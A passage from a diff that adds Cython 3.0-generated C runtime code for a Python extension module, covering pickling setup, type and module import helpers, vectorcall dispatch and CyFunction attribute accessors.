PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* TypeImport */ + #ifndef __PYX_HAVE_RT_ImportType_3_0_0 +#define __PYX_HAVE_RT_ImportType_3_0_0 +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject *module, const char *module_name, const char *class_name, + size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size) +{ + PyObject *result = 0; + char warning[200]; + Py_ssize_t basicsize; + Py_ssize_t itemsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + PyObject *py_itemsize; +#endif + result = PyObject_GetAttrString(module, class_name); + if (!result) + goto bad; + if (!PyType_Check(result)) { + PyErr_Format(PyExc_TypeError, + "%.200s.%.200s is not a type object", + module_name, class_name); + goto bad; + } +#if !CYTHON_COMPILING_IN_LIMITED_API + basicsize = ((PyTypeObject *)result)->tp_basicsize; + itemsize = ((PyTypeObject *)result)->tp_itemsize; +#else + py_basicsize = PyObject_GetAttrString(result, "__basicsize__"); + if (!py_basicsize) + goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (basicsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; + py_itemsize = PyObject_GetAttrString(result, "__itemsize__"); + if (!py_itemsize) + goto bad; + itemsize = PyLong_AsSsize_t(py_itemsize); + Py_DECREF(py_itemsize); + py_itemsize = 0; + if (itemsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; +#endif + if (itemsize) { + if (size % alignment) { + alignment = size % alignment; + } + if (itemsize < (Py_ssize_t)alignment) + itemsize = (Py_ssize_t)alignment; + } + if ((size_t)(basicsize + itemsize) < size) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize+itemsize); + goto bad; + } + if (check_size == __Pyx_ImportType_CheckSize_Error_3_0_0 && + ((size_t)basicsize > size || (size_t)(basicsize + itemsize) < size)) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd-%zd from PyObject", + module_name, class_name, size, basicsize, basicsize+itemsize); + goto bad; + } + else if (check_size == __Pyx_ImportType_CheckSize_Warn_3_0_0 && (size_t)basicsize > size) { + PyOS_snprintf(warning, sizeof(warning), + "%s.%s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize); + if (PyErr_WarnEx(NULL, warning, 0) < 0) goto bad; + } + return (PyTypeObject *)result; +bad: + Py_XDECREF(result); + return NULL; +} +#endif + +/* Import */ + static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportDottedModule */ + #if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__3; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* FetchSharedCythonModule */ + static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ + static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ + #if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ + static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + 